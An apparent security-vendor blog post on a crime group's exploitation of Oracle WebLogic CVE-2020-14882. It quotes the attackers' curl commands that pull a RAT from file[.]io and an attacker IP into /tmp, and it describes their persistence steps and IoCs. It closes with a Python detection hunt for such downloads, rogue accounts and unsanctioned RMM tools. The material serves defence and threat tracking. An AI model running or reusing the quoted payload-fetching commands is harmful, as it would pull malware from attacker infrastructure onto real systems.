EXPEL BLOG

MDR insights: defense against persistent threats and Oracle WebLogic CVE-2020-14882

· 8 MIN READ · AARON WALTON · NOV 12, 2024 · TAGS: Alert / Get technical / Threat hunting / vulnerability prioritization

TL;DR

  • A threat actor known for targeting vulnerabilities is currently targeting CVE-2020-14882 in Oracle WebLogic
  • This threat actor is financially motivated and is notorious for selling network access to ransomware gangs
  • If you use Oracle WebLogic, we recommend patching and keeping it up to date

In September of 2024, we observed multiple instances of successful exploitation of Oracle WebLogic. These events occurred against multiple customers and appear to have leveraged the same CVE-2020-14882 vulnerability each time.

Based on our observations, each incident was the result of a single criminal group targeting servers. Check Point tracks this threat actor as Magnet Goblin. We are sharing this report to provide public information for continued awareness and tracking of this threat actor, and we want to ensure organizations (you!) can continue to secure your environment.

Oracle WebLogic vulnerability meets Magnet Goblin

In 2020, a critical vulnerability was identified in Oracle WebLogic (CVE-2020-14882). WebLogic is an application server for hosting web apps—primarily eCommerce sites. Researchers found that the service had a critical vulnerability that could be exploited with as little as a single web request.

That single web request performs a path traversal that lets the attacker execute arbitrary code on the server. Severe vulnerabilities like this are frequently of interest to attackers because they provide an easy means of accessing a network.

Magnet Goblin is one of those interested crime groups. This group is known as an initial access broker (IAB). An IAB gains access to networks and then sells that access to other bad actors. Magnet Goblin has been known to work with ransomware gangs, like the Cactus Ransomware gang.

A critical vulnerability like CVE-2020-14882 is a valuable vulnerability to an IAB like Magnet Goblin. If a bad actor understands how to exploit a vulnerability like this, then they can use it to compromise multiple networks, and make a pretty penny. And from our observation, this appears to be the case with this CVE.

Based on public reporting, Magnet Goblin has regularly targeted several critical vulnerabilities in the past few years. They’ve also been observed exploiting similar vulnerabilities in QlikSense (CVE-2023-41267, CVE-2023-41265, and CVE-2023-48365), Ivanti Connect Secure VPN (CVE-2023-46805 and CVE-2024-21887), and Magento (CVE-2022-24086).

What we’ve seen

As mentioned previously, CVE-2020-14882 allows an actor to execute arbitrary code. In Magnet Goblin’s attacks, they execute the command “/bin/sh curl -k -o /tmp/nix hxxps://file[.]io/slzUjFaS9d94”. This command uses `curl` to retrieve a file from file[.]io and write it to the `/tmp` directory as “nix” (the `-k` flag tells curl to skip TLS certificate verification). In instances where the threat actor failed to pull the file from file[.]io, they used a SimpleHTTP server on their own systems instead, which looks like this: “/bin/sh -c curl -o /tmp/nix http://91.92.251[.]175:8383/nixrat”.

The attacker uses these commands to pull their preferred tools onto the host. The vulnerability lets them execute arbitrary commands, but that alone offers limited functionality, so they need to pull down additional tools to expand their access. Magnet Goblin uses the CVE to pull down a remote access tool (RAT) known as the NerBian RAT. Based on public reporting, this has been their preferred tool for several years.

For an IAB like Magnet Goblin, the most important thing is to maintain network access. After deploying the NerBian RAT, they create a user account for themselves named `sqladmin`. This account is then used to connect to other machines and deploy more RATs—including remote monitoring and management (RMM) tools—within the environment to fly under the radar. The bad actor often relies on commercial or open-source tools to avoid detection. In this instance, they deployed:

  • Panda Security Remote Control
  • SimpleHelp
  • N-Able Take Control
  • Level IO Remote Access Client

IABs deploy multiple RATs and RMM tools to ensure they retain network access no matter what. If one is blocked or removed, they can rely on the others. They often use commercial or open-source tools, with the expectation that these will have lower detection rates.

Magnet Goblin will also deploy a Ligolo tunnel. The Ligolo tunnel is used to hide the attacker’s access by routing it through a VPN. Thankfully, in the incidents we observed, the attacker didn’t get the chance to perform activity beyond deploying the RATs because their activity was identified and stopped by our SOC. 

Ties to Magnet Goblin

Based on the tactics we identified in our customers’ environments, it appeared that Magnet Goblin was the bad actor present. 

First, the actor appeared to consistently use Limenet infrastructure. In December 2023, eSentire reported a threat actor using the same IP address (91.92.251.175) in a similar incident to host a PowerShell script. According to their reporting, the threat actor also used several RATs for persistence, including Level IO Remote Access Client. In that incident, the actor gained access via a Qlik Sense vulnerability (CVE-2023-41266, CVE-2023-41265, or CVE-2023-48365). 

The infrastructure the attacker used, Limenet, is a virtual private server provider that promises “complete anonymity,” according to their website. In practical terms, Limenet maintains minimal logs and information about their customers, so the service is ripe for abuse from IAB groups (like Magnet Goblin).

In both the incident reported by eSentire and the incidents we observed, the threat actor leveraged `requestcatcher.com`. This service is an out-of-band application security testing (OAST) tool that lets users monitor their own web traffic—which the bad actor likely used to confirm successful web exploitation. Over the years, the attacker seems to consistently employ an OAST tool—and often the same tool—to validate their attacks.

Additionally, the NerBian RAT has historically been associated with Magnet Goblin, and may even be a custom malware of theirs. Their use of this RAT has been consistently reported over the last few years. Darktrace reported that an attacker downloaded it from Limenet infrastructure and, in the incident we observed, the malware also had a hard-coded command-and-control server on Limenet infrastructure.

All of this evidence made us confident that we were dealing with Magnet Goblin. 

Example indicators of compromise (IoCs)

The following table contains file hashes for the files that we observed. Like many RMM tools or RATs, these files may only be malicious if the tools aren’t expected in your environment.


The following table contains IP addresses and domains that were identified to be part of the malicious activity from the incidents that we investigated.

IP/Domain Context
91.92.251[.]175 Web server hosting attacker payloads.
91.92.249[.]195 IP address hard-coded into NerBian RAT binary.
27-96-43-135[.]ipq[.]jp VPN domain hosted at IPQ.JP leveraged by attacker to download payload.
bashupload[.]com A short-lived file hosting service intended for single-use commands. Was weaponized in attack to host NerBian RAT.
file[.]io A file hosting platform used by the attacker.
leprechaun[.]ehorus[.]com Management panel for Panda Remote Control.
mail[.]157-230-41-8[.]cprapid[.]com cPanel instance hosted in DigitalOcean, believed to be attacker-controlled.
157.230.41[.]8 IP address for cPanel instance hosted in DigitalOcean.
pruebas[.]pintacuario[.]mx Management domain used by SimpleHelp.
requestcatcher[.]com Out-of-band application security testing domain used to confirm successful exploitation.


Vulnerability prioritization is key for effective remediation

New vulnerabilities are found every day, but not all of them are interesting to attackers. It’s important to prioritize remediating exploited vulnerabilities over those that just exist. Expel provides this information as part of our vulnerability prioritization offering. And we utilize information from a customer’s network scans to understand what vulnerabilities are in an environment, so we can then recommend patching prioritization. Our prioritization recommendations are based on public and private information on what vulnerabilities attackers are targeting. This means that teams that we support can ensure they are patching or mitigating vulnerabilities that attackers are targeting quickly, without needing to do arduous research themselves.

Magnet Goblin’s track record helps create a concrete example of an attacker that prioritizes learning about and using critical vulnerabilities. Warning about these vulnerabilities isn’t just theoretical. There are real attackers who make a living out of targeting these vulnerabilities. It’s important to have an effective plan for mitigating risk around vulnerabilities when they’re identified because they can quickly become problems for your business.

It’s important to monitor and detect unexpected RMM tools. The website https://lolrmm.io/ is a good resource with a robust list of RMM tools that are often leveraged for abuse. This kind of list is useful in building detections or performing hunts for unauthorized RMM tools.
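As an added example (not code from the Expel report), the following Python hunt turns the behaviours described above into three checks over constructed process telemetry: a Java (WebLogic) parent spawning a shell that fetches a file into /tmp, creation of a local account such as sqladmin outside an expected set, and an RMM executable running on a host where that product is not sanctioned. The sample events, the allowlists and the four-entry RMM inventory (a stand-in for a list like lolrmm.io) are all hypothetical.

```python
import re
# Constructed sample process telemetry as (host, parent image, command line);
# made-up events modelled on the report's narrative, not Expel's data.
SAMPLE_EVENTS = [
    ("weblogic01", "java", "/bin/sh -c curl -k -o /tmp/nix https://file.io/EXAMPLEID"),
    ("weblogic01", "java", "/bin/sh -c ls /var/log"),  # no download: must not fire
    ("weblogic01", "nix", "useradd -m sqladmin"),
    ("win-fs02", "services.exe", r"C:\Program Files\N-able\MSP_Connect.exe"),
    ("win-fs02", "explorer.exe", r"C:\Users\sqladmin\Downloads\Remote Access.exe"),
    ("ops-jump01", "services.exe", r"C:\Program Files\SimpleHelp\Remote Access.exe"),
]
# Hypothetical allowlists: sanctioned (host, RMM product) pairs and accounts admins create.
SANCTIONED_RMM = {("ops-jump01", "SimpleHelp")}
EXPECTED_ACCOUNTS = {"svc_backup"}
# Small stand-in for an RMM inventory such as lolrmm.io: executable -> product.
RMM_BINARIES = {
    "remote access.exe": "SimpleHelp",
    "msp_connect.exe": "N-Able Take Control",
    "level.exe": "Level",
    "ehorus_agent.exe": "Panda Remote Control",
}
# curl or wget writing its output under /tmp, as in the observed commands.
WEB_DOWNLOAD = re.compile(r"\b(curl|wget)\b.*\s-[oO]\s*/tmp/", re.I)

def created_account(cmd):
    """Account name if cmd creates a local user via useradd or 'net user X ... /add'."""
    low = cmd.lower().split()
    if "useradd" in low:
        return low[-1]
    return low[low.index("user") + 1] if "/add" in low and "user" in low else None

def rmm_product(cmd):
    """Return the RMM product if the command's executable is in the inventory."""
    exe = re.split(r"[\\/]", cmd.strip('"'))[-1].lower()
    return RMM_BINARIES.get(exe)

def hunt(events):
    """Return (host, rule, command) hits for the three hunts over the events."""
    hits = []
    for host, parent, cmd in events:
        if parent == "java" and WEB_DOWNLOAD.search(cmd):  # 1. app server fetching a payload
            hits.append((host, "webserver_download_to_tmp", cmd))
        user = created_account(cmd)  # 2. local account outside the expected set
        if user and user not in EXPECTED_ACCOUNTS:
            hits.append((host, "unexpected_account:" + user, cmd))
        product = rmm_product(cmd)  # 3. RMM product not sanctioned on this host
        if product and (host, product) not in SANCTIONED_RMM:
            hits.append((host, "unsanctioned_rmm:" + product, cmd))
    return hits
```

On the sample events the hunt reports the WebLogic download, the sqladmin creation and the two RMM binaries on win-fs02, while the sanctioned SimpleHelp install on ops-jump01 is silent.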

If you have more questions on preventing or remediating similar CVEs, or want to learn more about our vulnerability prioritization or threat hunting offerings, you can reach out to us here.